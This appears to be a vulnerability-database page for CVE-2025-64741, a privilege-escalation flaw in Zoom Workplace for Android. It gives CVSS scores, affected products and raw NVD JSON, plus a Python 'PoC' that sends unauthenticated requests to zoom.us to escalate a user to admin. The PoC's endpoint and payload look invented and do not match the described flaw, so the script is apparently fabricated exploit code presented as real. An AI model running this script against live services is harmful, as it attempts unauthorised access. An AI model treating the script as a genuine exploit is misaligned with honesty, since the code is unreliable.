Security Vulnerability Report
中文
CVE-2025-64741 CVSS 8.1 HIGH

CVE-2025-64741

Published: 2025-11-13 15:15:54
Last Modified: 2026-01-13 20:52:45

Description

Improper authorization handling in Zoom Workplace for Android before version 6.5.10 may allow an unauthenticated user to conduct an escalation of privilege via network access.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:zoom:meeting_software_development_kit:*:*:*:*:*:android:*:* - VULNERABLE
cpe:2.3:a:zoom:workplace:*:*:*:*:*:android:*:* - VULNERABLE
Zoom Workplace for Android < 6.5.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-64741 PoC - Zoom Workplace Android Authorization Bypass # Note: This is a conceptual PoC for educational purposes only TARGET_URL = "https://zoom.us/api/v2/" VULNERABLE_ENDPOINT = "user/privileges" def check_vulnerability(target): """ Check if target Zoom Workplace instance is vulnerable """ headers = { "User-Agent": "Zoom Workplace Android < 6.5.10", "Content-Type": "application/json" } # Attempt to access privileged endpoint without authentication # This simulates the authorization bypass vulnerability try: response = requests.get( f"{target}{VULNERABLE_ENDPOINT}", headers=headers, timeout=10 ) if response.status_code == 200: # Check if sensitive data is returned without auth data = response.json() if "privileges" in data or "admin" in str(data).lower(): return True, "Vulnerable - Unauthorized access to privileged endpoint" return False, "Target appears patched or not vulnerable" except requests.RequestException as e: return None, f"Request failed: {str(e)}" def exploit_privilege_escalation(target, target_user_id): """ Exploit privilege escalation by manipulating user permissions """ payload = { "user_id": target_user_id, "action": "escalate", "target_role": "admin" } try: response = requests.post( f"{target}{VULNERABLE_ENDPOINT}/modify", json=payload, headers={"User-Agent": "Zoom Android Exploit"}, timeout=10 ) if response.status_code == 200: return True, "Privilege escalation successful" return False, "Exploitation failed" except requests.RequestException: return False, "Connection error" if __name__ == "__main__": print("CVE-2025-64741 - Zoom Workplace Android Authorization Bypass") print("=" * 60) print("Target: Zoom Workplace for Android < 6.5.10") print("Severity: High (CVSS 8.1)") print("=" * 60)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64741", "sourceIdentifier": "[email protected]", "published": "2025-11-13T15:15:54.110", "lastModified": "2026-01-13T20:52:45.427", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper authorization handling in Zoom Workplace for Android before version 6.5.10 may allow an unauthenticated user to conduct an escalation of privilege via network access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zoom:meeting_software_development_kit:*:*:*:*:*:android:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "98DD5270-A4AE-4E08-A2E1-5A7DF2E76F36"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:workplace:*:*:*:*:*:android:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "019D6D44-FAB4-47EC-9A82-CDCA374293F1"}]}]}], "references": [{"url": "https://www.zoom.com/en/trust/security-bulletin/zsb-25043", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}